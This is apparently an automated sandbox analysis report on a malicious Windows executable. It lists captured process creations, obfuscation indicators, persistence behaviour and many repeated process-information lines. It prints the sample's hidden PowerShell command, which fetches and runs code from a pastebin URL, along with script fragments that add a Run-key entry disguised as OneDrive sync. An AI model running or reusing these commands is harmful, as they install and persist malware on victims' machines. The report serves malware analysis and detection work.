Source: OSLdZanXNc.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: OSLdZanXNc.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: OSLdZanXNc.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: OSLdZanXNc.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Windows\System32\forfiles.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFE16625BFF push eax; iretd 4_2_00007FFE16625C09
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFE166F4490 pushfd ; retf 4_2_00007FFE166F4491
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFE166F0587 push eax; ret 4_2_00007FFE166F0592
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFE16644284 push eax; ret 12_2_00007FFE1664428D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFE16717BCA pushad ; ret 12_2_00007FFE16717BCD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFE16716DC3 push edi; iretd 12_2_00007FFE16716DC6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFE16710221 push eax; ret 12_2_00007FFE16710222

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: .lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $currentPath + ";$env:tmp"[System.Environment]::SetEnvironmentVariable("PATH", $newPath, "User")#New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Driver Diagnosis" -Value "regsvr32.exe /s DriverDiag" -PropertyType String -ForceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Force#$source = "https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll"#$destination = "$env:tmp\DriverDiag.dll"#Invoke-WebRequest -Uri $source -OutFile $destinationmkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
